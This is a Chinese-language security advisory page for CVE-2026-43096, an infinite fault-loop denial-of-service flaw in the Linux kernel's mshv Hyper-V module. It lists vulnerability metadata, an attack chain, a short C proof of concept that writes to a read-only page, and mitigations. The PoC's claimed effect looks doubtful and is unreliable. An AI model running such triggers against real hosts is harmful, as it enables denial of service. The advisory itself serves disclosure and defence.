CVE-2026-43096 CVSS 5.5 中危

CVE-2026-43096: Linux内核mshv模块无限循环漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43096

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的mshv（Microsoft Hyper-V）模块存在一个安全漏洞，该漏洞源于处理访客物理地址（GPA）拦截时的逻辑缺陷。当访客机尝试访问没有适当权限的内存区域时，系统未能正确验证访问类型与区域权限的匹配性。具体而言，如果访客机向只读区域写入数据，重映射操作虽然成功但区域状态未变，导致立即再次发生错误，从而触发无限故障循环。这不仅会导致vCPU资源耗尽，还可能被恶意访客利用作为拒绝服务攻击向量，消耗主机资源。

技术细节

该漏洞位于Linux内核的mshv模块，具体涉及`mshv_handle_gpa_intercept`函数。在虚拟化场景中，当访客机发生访客物理地址（GPA）权限错误时，该函数负责处理拦截。原代码在处理可移动内存区域的缺页异常时，未先验证访问类型（如写或执行）是否与内存区域的权限（如只读或不可执行）兼容。攻击者可诱导访客机向只读内存区域发起写入操作。此时，mshv尝试重映射页面，但由于权限检查缺失，重映射未能解除访问限制，导致指令执行后立即再次触发相同的GPA拦截。这种机制缺陷使得vCPU陷入无限的自旋循环，持续占用主机CPU周期，最终导致宿主机资源耗尽形成拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取运行在启用mshv的Linux宿主机上的低权限访客机访问权限。

STEP 2

步骤2

攻击者在访客机内部执行代码，识别出内存中的只读或不可执行区域。

STEP 3

步骤3

攻击者程序尝试对该受保护的内存区域执行违规操作（如向只读页写入数据）。

STEP 4

步骤4

宿主机的mshv模块拦截到GPA错误，尝试重映射但未拒绝非法访问，导致vCPU陷入无限循环。

STEP 5

步骤5

主机CPU资源被持续耗尽，导致宿主机或其他虚拟机出现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

// Conceptual Proof of Concept for CVE-2026-43096
// This code attempts to write to a read-only memory region
// which may trigger the infinite fault loop in the host mshv module
// if running inside a guest VM.

int main() {
    printf("[+] Triggering PoC for CVE-2026-43096\n");

    // Allocate a memory page with Read-Only permissions
    size_t page_size = getpagesize();
    char *ro_page = mmap(NULL, page_size, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (ro_page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }

    printf("[+] Allocated Read-Only page at %p\n", ro_page);

    // Attempt to write to the Read-Only page
    // In a vulnerable mshv setup, this triggers the fault loop
    printf("[+] Attempting to write to Read-Only page...\n");
    
    // This line causes a SIGSEGV in normal user space, 
    // but inside a VM with the mshv bug, it triggers the hypervisor issue.
    strcpy(ro_page, "CRASH"); 

    printf("[-] Write failed or execution continued unexpectedly.\n");
    return 0;
}

影响范围

Linux Kernel (mshv enabled)

防御指南

临时缓解措施

如果业务不依赖mshv（Microsoft Hyper-V）虚拟化功能，建议在内核配置中禁用该模块。对于必须使用的情况，应确保虚拟机资源隔离，并监控宿主机CPU使用率，一旦发现异常飙升及时干预。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表